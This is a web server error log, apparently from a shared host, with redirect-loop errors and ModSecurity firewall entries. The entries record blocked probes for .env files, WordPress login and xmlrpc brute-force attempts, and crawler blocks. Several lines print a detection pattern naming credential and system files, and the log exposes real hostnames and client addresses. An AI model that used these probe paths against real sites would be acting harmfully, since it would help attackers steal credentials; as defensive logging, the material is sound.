[Tue May 26 18:31:10.378466 2026] [core:error] [pid 998632:tid 998891] [client 5.255.120.167:54978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.387595 2026] [core:error] [pid 1007701:tid 1007835] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.387611 2026] [core:error] [pid 1007701:tid 1007835] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.392666 2026] [core:error] [pid 998632:tid 998822] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.392690 2026] [core:error] [pid 998632:tid 998822] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.407232 2026] [core:error] [pid 998632:tid 998865] [client 5.255.120.167:54998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.407247 2026] [core:error] [pid 998632:tid 998865] [client 5.255.120.167:54998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.412033 2026] [core:error] [pid 998632:tid 998820] [client 5.255.120.167:54920] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.412054 2026] [core:error] [pid 998632:tid 998820] [client 5.255.120.167:54920] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.412168 2026] [core:error] [pid 998632:tid 998884] [client 5.255.120.167:54996] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.412179 2026] [core:error] [pid 998632:tid 998884] [client 5.255.120.167:54996] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.412882 2026] [core:error] [pid 998632:tid 998851] [client 5.255.120.167:54982] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.412894 2026] [core:error] [pid 998632:tid 998851] [client 5.255.120.167:54982] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.413845 2026] [core:error] [pid 998632:tid 998849] [client 5.255.120.167:55046] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.413858 2026] [core:error] [pid 998632:tid 998849] [client 5.255.120.167:55046] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.417547 2026] [core:error] [pid 998632:tid 998913] [client 5.255.120.167:55108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.417569 2026] [core:error] [pid 998632:tid 998913] [client 5.255.120.167:55108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.422292 2026] [core:error] [pid 998632:tid 998890] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.422299 2026] [core:error] [pid 998632:tid 998914] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.422307 2026] [core:error] [pid 998632:tid 998890] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.422317 2026] [core:error] [pid 998632:tid 998914] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.423559 2026] [core:error] [pid 998632:tid 998858] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.423573 2026] [core:error] [pid 998632:tid 998858] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.443491 2026] [core:error] [pid 998632:tid 998802] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.443507 2026] [core:error] [pid 998632:tid 998802] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.447233 2026] [core:error] [pid 998632:tid 998874] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.447257 2026] [core:error] [pid 998632:tid 998874] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.483440 2026] [core:error] [pid 998632:tid 998866] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.483458 2026] [core:error] [pid 998632:tid 998866] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.611967 2026] [core:error] [pid 1007701:tid 1007843] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.611990 2026] [core:error] [pid 1007701:tid 1007843] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:10.618333 2026] [security2:error] [pid 998632:tid 998673] [remote 31.24.44.107:45054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZlq1OTU2dW0MS1EnIewAAKBQ"]
[Tue May 26 18:31:10.679404 2026] [security2:error] [pid 998632:tid 998795] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZlK1OTU2dW0MS1EnIMAAAAAQ"]
[Tue May 26 18:31:10.914937 2026] [security2:error] [pid 1007701:tid 1007846] [client 176.65.139.229:58272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahWZlg05qHzKMxj0enGZ_gAAAJQ"]
[Tue May 26 18:31:10.932199 2026] [security2:error] [pid 1007701:tid 1007844] [client 176.65.139.234:50306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWZlg05qHzKMxj0enGZ_wAAAJI"]
[Tue May 26 18:31:10.941181 2026] [security2:error] [pid 1007701:tid 1007845] [client 176.65.139.229:58280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahWZlg05qHzKMxj0enGaAAAAAJM"]
[Tue May 26 18:31:11.066247 2026] [security2:error] [pid 998632:tid 998924] [client 176.65.139.232:41440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.thedebateafrica.org"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahWZl61OTU2dW0MS1EnIggAAAH8"]
[Tue May 26 18:31:11.117052 2026] [security2:error] [pid 998632:tid 998834] [client 176.65.139.231:59204] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.thedebateafrica.org"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahWZl61OTU2dW0MS1EnIgwAAACk"]
[Tue May 26 18:31:11.117899 2026] [security2:error] [pid 998632:tid 998862] [client 176.65.139.229:58292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcontacts/.env"] [unique_id "ahWZl61OTU2dW0MS1EnIhAAAAEQ"]
[Tue May 26 18:31:11.121107 2026] [security2:error] [pid 998632:tid 998832] [client 176.65.139.231:59212] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "newtest.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWZl61OTU2dW0MS1EnIhQAAACc"]
[Tue May 26 18:31:11.481472 2026] [security2:error] [pid 998632:tid 998814] [client 176.65.139.231:59220] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "newnigeria.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWZl61OTU2dW0MS1EnIkAAAABc"]
[Tue May 26 18:31:11.502346 2026] [security2:error] [pid 998632:tid 998875] [client 176.65.139.237:39378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "workrepublic.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWZl61OTU2dW0MS1EnIkQAAAFA"]
[Tue May 26 18:31:12.863751 2026] [security2:error] [pid 998632:tid 998758] [remote 31.24.44.107:45054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZmK1OTU2dW0MS1EnItwAAJWU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:31:13.497370 2026] [security2:error] [pid 998632:tid 998843] [client 173.239.240.37:58461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahWZma1OTU2dW0MS1EnIuwAAADE"]
[Tue May 26 18:31:13.831074 2026] [security2:error] [pid 998632:tid 998858] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZl61OTU2dW0MS1EnIjwAAAEA"]
[Tue May 26 18:31:15.318467 2026] [security2:error] [pid 998632:tid 998924] [client 124.43.5.103:10839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZm61OTU2dW0MS1EnI5AAAAH8"]
[Tue May 26 18:31:15.318690 2026] [security2:error] [pid 998632:tid 998924] [client 124.43.5.103:10839] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZm61OTU2dW0MS1EnI5AAAAH8"]
[Tue May 26 18:31:17.290444 2026] [security2:error] [pid 998632:tid 998836] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZma1OTU2dW0MS1EnIygAAACo"]
[Tue May 26 18:31:17.731062 2026] [security2:error] [pid 998632:tid 998731] [remote 51.91.98.45:48804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZna1OTU2dW0MS1EnI_gAAWEs"]
[Tue May 26 18:31:18.190249 2026] [security2:error] [pid 998632:tid 998754] [remote 143.198.203.76:35226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWZnq1OTU2dW0MS1EnJBQAARmE"]
[Tue May 26 18:31:19.360989 2026] [core:crit] [pid 1007701:tid 1007884] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:31:19.718203 2026] [security2:error] [pid 1007701:tid 1007867] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZnQ05qHzKMxj0enGaDwAAAKk"]
[Tue May 26 18:31:20.462560 2026] [core:crit] [pid 1007701:tid 1007941] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:31:20.724376 2026] [core:crit] [pid 1007701:tid 1007919] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:31:20.855922 2026] [security2:error] [pid 1007701:tid 1007703] [remote 132.148.72.88:33220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZoA05qHzKMxj0enGaMgAA7QE"]
[Tue May 26 18:31:21.156766 2026] [security2:error] [pid 1007701:tid 1007737] [remote 132.148.72.88:33220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZoQ05qHzKMxj0enGaOwAA7yM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:31:21.791790 2026] [security2:error] [pid 1007701:tid 1007949] [client 172.225.181.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWZoQ05qHzKMxj0enGaQgAAAPs"]
[Tue May 26 18:31:22.951097 2026] [security2:error] [pid 1007701:tid 1007897] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZnw05qHzKMxj0enGaIwAAAMc"]
[Tue May 26 18:31:23.759645 2026] [core:crit] [pid 998632:tid 998913] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:31:24.312219 2026] [security2:error] [pid 1007701:tid 1007944] [client 102.211.109.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZoQ05qHzKMxj0enGaPgAAAPY"]
[Tue May 26 18:31:24.635516 2026] [security2:error] [pid 998632:tid 998880] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZoq1OTU2dW0MS1EnJKAAAAFU"]
[Tue May 26 18:31:25.377067 2026] [security2:error] [pid 1007701:tid 1007908] [client 103.240.99.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZpQ05qHzKMxj0enGaWgAAANI"], referer: https://www.anujtradingco.com/
[Tue May 26 18:31:25.711918 2026] [security2:error] [pid 1007701:tid 1007761] [remote 47.128.116.94:25660] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/portfolio/minimalistic-art-house/"] [unique_id "ahWZpQ05qHzKMxj0enGaYwAAwDs"]
[Tue May 26 18:31:25.914051 2026] [security2:error] [pid 1007701:tid 1007705] [remote 51.91.98.45:44036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZpQ05qHzKMxj0enGaaAAAzgM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:31:25.972155 2026] [security2:error] [pid 1007701:tid 1007934] [client 124.43.5.103:11295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZpQ05qHzKMxj0enGaawAAAOw"]
[Tue May 26 18:31:25.972301 2026] [security2:error] [pid 1007701:tid 1007934] [client 124.43.5.103:11295] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZpQ05qHzKMxj0enGaawAAAOw"]
[Tue May 26 18:31:26.759084 2026] [security2:error] [pid 1007701:tid 1007953] [client 103.240.99.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZpg05qHzKMxj0enGadAAAAP8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431019&moderation-hash=fd79c7ba842f043545fdc763b9a0755e
[Tue May 26 18:31:27.059573 2026] [security2:error] [pid 1007701:tid 1007898] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZpQ05qHzKMxj0enGaVAAAAMg"]
[Tue May 26 18:31:30.188059 2026] [security2:error] [pid 1007701:tid 1007851] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZpw05qHzKMxj0enGahQAAAJk"]
[Tue May 26 18:31:31.271913 2026] [core:error] [pid 998632:tid 998816] [client 45.148.10.204:32914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.271937 2026] [core:error] [pid 998632:tid 998816] [client 45.148.10.204:32914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.276549 2026] [core:error] [pid 998632:tid 998859] [client 45.148.10.204:32924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.276561 2026] [core:error] [pid 998632:tid 998859] [client 45.148.10.204:32924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:31:31.297592 2026] [core:error] [pid 998632:tid 998863] [client 45.148.10.204:32928] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
